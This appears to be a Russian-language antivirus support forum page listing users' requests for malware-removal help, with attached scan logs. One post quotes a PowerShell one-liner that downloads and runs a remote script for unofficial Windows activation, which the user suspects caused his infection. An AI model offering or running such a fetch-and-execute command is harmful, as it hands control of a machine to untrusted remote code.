Проверка на вредоносные программы
-
Похожий контент
-
От para87
Я заметил что включаешь комп играешь работаешь ну и т.д и после там часа или 2 не помню точно не могу открыть Kaspersky Plus нажимаю на иконку где часы и не чего не происходит тоже самое и на ярлык тоже не хочет открываться. Помогает перезагрузка пк сразу открывается работает нормально. Я удалил Каспера утилитой kavremover и заново поставил обновил провел полную проверку не чего не нашёл. Пока все хорошо. Просканировал еще FRST64 вот лог. Посмотрите может я зря беспокоюсь и это все ерунда.
CollectionLog-2025.02.21-16.59.zip Addition.txt FRST.txt
-
От Artemkaaa
Пытаюсь провести полную проверку либо проверку автономным модулем
Не получаеться,делаю полную проверку и сканирует всего 240 файлов и пишет пункт пропущен вовремя сканирования и все =/A автономный модуль даже не запускается. Windows 10 Домашняя
-
От Кристина1983
Здравствуйте! Вчера по электронной почте пришел вредоносный файл, якобы Накладная.pdf, но файл был не PDF, просто маскировался. Письмо из почты удалила, при попытке почистить папку удаленные, через несколько секунд это удаленное письмо в удаленных восстанавливалось (почтовый клиент Thunderbird). Касперским проверила лог прилагаю, но в почтовом клиенте опять в удаленных было это письмо. Снова запустила утилиту Касперского с полной проверкой. Было проведено лечение с перезагрузкой.
Прошу проверить остались ли вредоносные следы в системе?
Логи Kaspersky Virus Removal Tool Reports.rar
Логи AutoLogger, после того как отработал Kaspersky Virus Removal Tool
CollectionLog-2025.02.06-15.12.zip
-
От vlanzzy
CollectionLog-2024.12.19-19.35.zip
Произошло заражение вирусом, выполнял проверку через KVRT и смог удалить вирусы, но теперь запускается task.vbs
-
От Snake200221
Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует
Также недавно активировал систему командой в сmd, а именно "powershell iex (irm 'activated.run/key')". Может быть это она спровоцировала данную проблему
CollectionLog-2025.01.04-00.02.zip
-
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти